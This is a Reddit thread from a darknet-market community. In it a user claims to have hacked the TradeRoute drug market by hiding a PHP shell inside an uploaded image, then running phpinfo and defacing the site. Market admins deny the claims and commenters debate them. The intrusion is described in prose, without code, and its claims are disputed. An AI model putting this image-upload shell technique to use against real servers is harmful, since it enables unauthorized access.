TradeRoute Hacked

No response from support for 2 days, last response completely ignored the fact that I had managed to retrieve sensitive server information, they aren't taking security seriously at all.

I currently have a shell placed on their server executing phpinfo returning information on their back-end Apache server. They are running an Nginx front-end as a reverse proxy.

This took a while as I've been attacking their market for a few weeks, but their new request limitations to mitigate DDOS attacks has slowed me down, I asked them to disable this for my session as I had managed to run a php shell, however their image stripping was clearing out my malicious code.

After comparing my original image hex bytes to the uploaded image bytes, there were some of the original bytes in there, so I was able to replace them and test which functions were enabled. Of course, security 101 issue straight away, phpinfo is enabled and happy to serve me with the goodies mostly server OS information and security patches that had been installed. I am not able to get much further than that due to their directory permissions preventing directory traversal and most other functions I am unable to exploit. This is a severe security concern though and I hope they can at least come forward and be transparent. Still working on getting their IP to leak right now so will update the thread, also if I hear anything from them.

I have sent proof to the subreddit Mods and will be making further posts. Also not sure if they fixed it yet, because I reported it last week, but you could view anyone's support ticket if you had the ticket ID.

Try not to keep your funds on the market right now if you still choose to use it, they could easily walk away with the money following this.

Edit I'd like to take this as an opportunity to mention I rooted "Transit Market" which is linked on DDW. It was hosted on the guys home PC within his user directory, which gave me his first name. Seems like he may have taken the market down as I can't access it right now, I had also sent proof of this with my deface page to the reddit Mods last week.

edit 2 Managed to upload deface page :) http://traderouteilbgzt.onion/hugbunter.html

edit 3 SHELL AND DEFACE PAGE WAS JUST REMOVED NOW. Hopefully I get a response from support now

edit 4 Response from support completely denying everything and telling me I am spreading FUD after clearly fixing the issue and removing the shells.

Admin 22 August 2017 12:46 Why are you spreading FUD about us? It's not possible to show a random html, even if you could put it in the public folder, as the server is configured to show only a few controlled files. Besides you have no clue about the server software we use, as you shown on reddit. What does the DDOS limitation have to do with images upload? Complete non sense, please show a single proof about your claims.

HugBunter 22 August 2017 13:43 I am not spreading any FUD and you misunderstood regarding the DDOS limitations and image upload, it was preventing me from attempting different methods quickly in an automated fashion. I can assure you it parsed the html file just fine in the public folder and you would know as the file has been removed, along with the image shells. Why are you denying it rather than working with me, that's why I contacted you and had no response. Also, a lot of public details wouldn't be correct, just the way I wouldn't post your IP address publicly even if I had managed to get it to leak. I was trying to help but insecurities such as this and then denying it after fixing it is absurd.

Are you genuinely trying to play this down or do you have multiple developers and another could have accessed and buried this? I don't understand why you are point blank denying what was publicly proven..


Comments


[125 Points] idevensmokeraisins:

It was hosted on the guys home PC within his user directory, which gave me his first name

jesus christ


[110 Points] iiiiddddd:

Go to TradeRoute they said. Dream is compromised they said. Daily reminder that 99% of the people on this sub-forum don't know shit.


[58 Points] birdtrucker:

Hyuk, Garsh!

Edit I'd like to take this as an opportunity to mention I rooted "Transit Market" which is linked on DDW. It was hosted on the guys home PC within his user directory, which gave me his first name.

God i love this place, endlessly entertaining


[40 Points] PonderingYou:

Best thing I have witnessed HAHA http://i.imgur.com/0vRfXUC.jpg


[28 Points] ice_cream4breakfast:

Fuck, this really sucks. So the darknet totally sucks these days. Wtf are we supposed to do? HugBunter please make us a market.


[21 Points] QEywvcB9utqScJN6:

A message from the TR admins:

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Hello,

This is an official communication as we see a lot of people believing HugBunter's claims.

The servers haven't been compromised in any way, this guy is just seeking some attention. We have talked to him through a support ticket and he repeatedly failed to provide any proofs, if his claims were true he would be able to (at least) provide the version of PHP we use, but he couldn't. So the hack is completely false.

About the deface page, it simply can't be done the way he says. HugBunter's claims are that he did create an HTML file of his own inside the public folder of our server and it was accessible from outside by any user. This is completelly impossible becuase our server is configured to only parse a few specific files and it has always been like this. So placing a random HTML file inside the server folder is not enough, he would need to escalate privileges to change the server's configuration, and he didn't do that, as he clearly states in his reddit post.

Also he claims that we did remove the HTML file and his PHP shell. But we didn't do this as there wasn't any of them in our servers.

But not only he is not able to provide any proofs, he's completelly wrong about the server software we use, our configuration and generally anything he said in that post.

We have always accepted bugs found in our market and paid serious bounties for them, I see no reason to not do so or to hide any findings. I think people are generally aware that any software has some bugs and we are eager to find and solve them. Personally I don't care about them going public once they are solved.

I don't know what kind of "proofs" did HugBunter provide to the reddit's DarknetMarketMods, but they are totally false for sure.

Best regards! -----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEUq8osDSa5n6e0We9bW5rE4SjgIAFAlmcVooACgkQbW5rE4Sj gIBdDgf+K2Hlbym7z8zXMCKA2028OwFcRVD1Gmmetq/rO25b7M+6lybBfTOIK2/w HzRrE3jA1Id8oUcwvCgVNMvclh/+I4l6kFRhNkPfmWts/2EX1AuD7y/MbqklVGYC yrL+YJFlemq+RaUnpvqnpsILaKMAaScUvolLOP7cS17n4qJXVRDD7xQChnHN2CQs o6eiULqeZZgT3Mm/DMhkoyoi4oEzPdG1KsT8QfEroAsCAh71QAfCJODVPAvFm6s1 IMI+FIwuRxBZyRJlLsVPuV1a0LgqipkzGZZbtWgHbt/c9xBagn+RHGXzv7wlKYNo /5YXhZadZDhZMWXCT6J8kSHDMpw4pw== =5lvG -----END PGP SIGNATURE-----


[18 Points] uglygoldfish:

can you put that in lamens terms please mate I do not quite understand the issue?


[15 Points] ThrowitoutASAP:

How do I become as knowledgeable as you?


[13 Points] None:

OP. Do you have autism?


[11 Points] _PrinterPam_:

You "have a shell placed on their server?" What on Earth does that mean? Did you mean to say you were able to create a shell account on the server? No sudo privileges, obviously since you've already admitted there's not much you can do since they apparently (from what I'm reading of your post) have solid permissions on the filesystem.

Re: NGINX: And? It's one of the most commonly-used reverse proxies/webservers due to it's excellent scalability and HA compatibility (even by default, and made better with proper configuration). I use it on my hidden service as well, though I edit the source by hand and compile it to ensure it doesn't easily betray itself (headers and some other stuff). Which, granted, is a good idea...but a motivated adversary, and certainly a state actor, can find ways to identify the software used in any event. I mean, it's not like most attackers don't already use automation to probe for weaknesses in the three big ones anyway. They can stab at all three big flavors (Apache, NGINX, and light-d) in not much more time than just hitting one of them. I see this occurring in my logs on a daily basis.

And now, as I'm reading more of your post...basically you're saying the only real thing you've accomplished is that you got some server info via phpinfo but you haven't been able to do anything with it. So you have not hacked anything. You've perhaps encountered a vulnerability or two with questionable practical applications. No software has ever been, or ever will be, without faults. And what means have you used to determine that you didn't fall into a nice honeypot, meant to send you on a wild goose chase? I'm not saying that's the case, but as I'm not seeing you mention anything in this regard...it's possible you've been duped. I make use of Red Herrings myself (including, but not limited to, a somewhat difficult to find false IP or two, maybe a fake name or email address or two, etc. They're quite handy at times.

And sorry, but I just don't buy the "running on a home pc" thing. The number of half-open connections and the huge amount of traffic that market surely has, on any home connection, even if it's a business-account with symmetric speeds (not as likely), would bring the service to it's knees and leave it there. Even if it's being cached/served-out by reverse proxies.

EDIT: Now I see you said "Transit" market for the home PC blurb. Make a different post. Don't go ADD on us on a post about TR by including completely unrelated stuff from another market.


[9 Points] elfer90:

hugbunter needs to make us a secure market


[6 Points] Pelican_Vendor:

rm -rf man..


[7 Points] CookyDough:

We're grateful for all the work you do!


[4 Points] XanaxBoss:

Can any mod confirm the authenticity of this? Why no evidence?


[5 Points] HardC0r3:

you contacted them and they did not answer? I hope they wont exit now....


[4 Points] talkativemonks:

teach me senpai


[3 Points] Those_Good_Vibes:

If you don't break this market (for a few weeks), I'll love you forever and give you mouth hugs <3


[5 Points] HardC0r3:

well thats fuck. Whos next?


[5 Points] 0ni0n3at3r:

Hopefully they get shit together. I was starting to actually like that market


[4 Points] None:

[deleted]


[3 Points] mrmollyboy:

This is going to make me cry.


[3 Points] Axaq:

edit 2 Managed to upload deface page :) http://traderouteilbgzt.onion/hugbunter.html

Now that is just pure evil. Well done sir.


[3 Points] cubegood:

Well, I'm glad I saw this. Was about to deposit tonight and make my first purchase. Thanks for saving me some money.


[2 Points] Bigw0rmer:

I also found a few bugs and let the admin know .. they closed the ticket on me .i knew it would be only a matter of time till someone else found them ..Ugh fuck trade route it was true amateur hour over there , One of the bugs i found let me bypass the crawl ban and let me index the whole site ..meaning i have an exact working copy of trade route


[2 Points] dts-NOW:

The fact that they are thwarting your efforts and you haven't really achieved anything is a credit to the market to be honest. I understand your want for transparency but put yourself in their position, surely you would secure your own server before wasting time coming on reddit to talk? Damage limitation and plugging holes should be the main priority for anyone under attack in my opinion. Action first, talk later. That being said, I do hope they come clean about the situation and reply to you after this round is over.


[2 Points] LegendaryPainTrain:

Maybe now everyone will think twice before using PHP.


[3 Points] weeeeee6:

Anyone have a screenshot of hugbunter.html ? i would like to see what it looked like


[2 Points] None:

something is rotten in the state of Denmark


[2 Points] mrfloridamolly99:

Well shit, it had potential :(


[2 Points] KingXombi:

Any confirmation on this? Smh if it's true. Like DHL all over again..


[4 Points] qubesfan:

An old schooler posted here about a year ago discussing how wretched the landscape could be once AB inevitably disappeared because there was no legitimate "heir apparent" capable of rising to the occasion.

He really nailed that prediction.


[2 Points] Gyratetojackjarvis:

Are you worried that by helping these sites LE will somehow connect you to them and cause you legal issues?

I'm sure being a security adviser to a an illegal drug trading platform is a fairly grey area in terms of the law. Although a pretty huge niche in the market so good luck with it!

Just be careful dude and plz don't don't hack me lol


[2 Points] None:

I knew this was going to happen....I just said I was weary of this market yesterday....and this is one of the reasons.


[2 Points] None:

[deleted]


[2 Points] losfalcor:

Excuse me, is OP a hacker testing the security of dark net sites for the good of the community?


[2 Points] Manifest122:

This is ridiculous. They're lucky it was you that decided to poke around and not someone with more malicious intent, and they decided to deny it? Fuck this market, I advise everyone else to steer well clear.


[2 Points] WhewCookie:

I call bullshit


[1 Points] josemoop:

FFs i forgot my pin 5 days till reset 50 bucks on there ;-; gettin fucked with all these markets :(((


[2 Points] DNrick_sanchez:

"trade route is best " they all said, ive had a bunchof successful pck rpg'in on dreamland and thats the fucked up one round here

while i agree its a matter of time before any market goes down ill stick to dream till then with vendors who know me and pgp encryption 4096 keys locally encrypted on nice clean specfic linux distro


[1 Points] murderhomelesspeople:

Have you ever given Zion market a go?


[1 Points] S0faKin:

Have you tested the security on any others markets apart from TradeRoute?


[1 Points] real_gg249:

SR3.0 Coming soon..just wait on it


[1 Points] yellow_soap:

Belize, Run.


[1 Points] AMPTEST:

I guess at the end of the day, this isn't the end of the world. Just easy to get hyped up after recent events.

Let's not forget how alphabay let all the messages of users and buyers become public not once, but twice.

Or how dream is a shit show. Your chances on dream is about the same as ordering NL>US, you just gotta hope it works and don't steal your money. Not to mention they had a supposedly leaked IP address.

Yes, there is a few problems on the horizon, and there will be a few more. But our attitude towards everything is how we can make it better instead of worse.

What /u/hugbunter did was look for exploits and he found a few. But I feel like he was trying to shut the whole site down/create fear and panic at the same time.

Maybe he is better at probing the inter workings of a network then he is with his words, but I feel like this could have been taken into a more productive, and positive approach from what he has found instead of stepping on the ant pile of dmn'ers that has already tried to recolonize multiple times this summer.


[1 Points] whatsmynamep:

Have you tried you upload index.html? I bet their config was

index index.html index.php;

Then everybody redirected hehe. You're a cool guy


[1 Points] Nexux720:

I placed an order last night and it says it has been shipped. Should I be worried?


[1 Points] Jackpottino:

Okay, so the admins were douchebags with you but from last edit you wrote now it's safer to use it or not?


[1 Points] JburnaDNM:

Jesus Christ! Good job, I guess lol? We are fucked as a community. Thanks to the Feds and hackers I have been clean for almost 4 months.


[1 Points] DNMTiger:

ugggh, can they please get my two orders shipped before they end up pulling the site dhl style


[1 Points] eyekantbeme:

After I saw the User interface on this site, I stopped browsing it. I just had a bad gut feeling about it. Plus there isnt much selection. Im definitely anticipating that new site you alluded to....A new Agora sounds amazing.


[0 Points] None:

[deleted]


[0 Points] DrLankton:

Everyone knows all these markets suck. It's like they're all ran by a bunch of monkeys. Absolutely no knowledge of anything. Very sad that so little effort is put into such an important thing and the more some of you dumbasses keep accusing OP of fud and no proof while also supporting these fools, they more things wil continue to be the way they are.


[0 Points] bhp5:

You guys take this roleplay thing quite serious, huh?


[0 Points] l33t4ever:

Am I missing something? Why no mention of this at all on the TR forums?


[0 Points] Spicy_Tripp:

Soooo is TR sus? LE involved in running it possibly? Or you think they just haven't ironed out security yet (not saying that's good either)... Im so sketched out about all these markets right now IDK how dream is still going strong with all these busts and then a bunch of new markets come outta nowhere (yeah it's happened before markets go down and come back up, but not when there's literally 1-2 huge busts every day for weeks) ...


[0 Points] JohnnyYenOnTheDnms:

what kind of cognitive dissonance are you going through to gild the OP?

say wut?

edit: I'm glad they told you to fuck off as well, reason being IF there was a major issue (which i don't think there was) it will be fixed now and life will go on and ppl like you will be less inclined to practically force markets to fuck off,

how is killing markets helping the "community" that you say you're looking out for, my ass, it's just assisting the cops, and fucking ppl over, not "saving" them. you're a wolf in sheep's clothing


[0 Points] Lyzergic:

To be very honest... I noticed that a couple weeks ago. I didn't wanna fuck it, so I wrote to support as well. Similar story. No response, but I use the market and I figured why ruin a good thing, but kodos for not condemning the market to hell because it really wouldn't have been very hard.

To tell you the truth, most of the people on here would just shrug. When I wanna get something, I save my favorite vendor's keys load my account get what I want, withdraw my coins and kick back n wait for my pack.

Support should really take these things more seriously. At this point, I've come to a point where I assume the market is compromised. Always. I encrypt to my regular vendors saved keys, I make sure its the same key two or three times. Log on, paste the encrypted message, place the order, and get off. My regular choices are FE, and so far I haven't been burned (knock on wood)


[0 Points] artfu1:

why cant peple just leave these sites alone!

fuckers


[-2 Points] trooper0:

OP claims to be advocating for a safer market? What a broke kid! We reached out to these markets he claim to have hacked, Demanded for some sort of 'ransom' else threaten to expose them. If you're indeed trying to advocate for a safer market as you claim, you should not be blackmailing admins with an intention of exposing them. You should do it voluntarily with a clean motive. Showing where the problems are! The moment you ask for money else you expose, your contribution is useless! And you'll remain broke for a long time.


[-4 Points] iiiiddddd:

Why the fuck would anybody use some random shitty little market that just popped up after the AB/Hansa bust??


[-4 Points] Lucid_Enemy:

It's been an hour, this post has been tagged and YET NO MOD HAS COME FORWARD TO CONFIRM RECEIPT OF PROOF....

Also I can use buzz words too.... You contradicted yourself several times I'll point one of them out Apache (old http deamon) and ngix do the same thing, they also both have the capability to run several instances where one can act as a reverse proxy (don't see why that's even needed since there isn't a NAT involved)


[-5 Points] 8thaccountbanned:

proof plz or gtfo


[-9 Points] ExplainPls2:

WELL THANKS HUGBUNTER. THANKS A BUNCH. IT'S NOT LIKE SOME OF US DON'T WANT OUR DRUGS NO MATTER WHAT. WAY TO MAKE IT A SAFER PLACE.

/s?


[-8 Points] None:

[deleted]


[-7 Points] None:

[deleted]


[-9 Points] AMPTEST:

Bro why the fuck are you talking the way you are. This isn't even fit for a coder to read. Your being stupid


[-16 Points] THE_DEEP_MOB_CONNECT:

Your a piece of shit.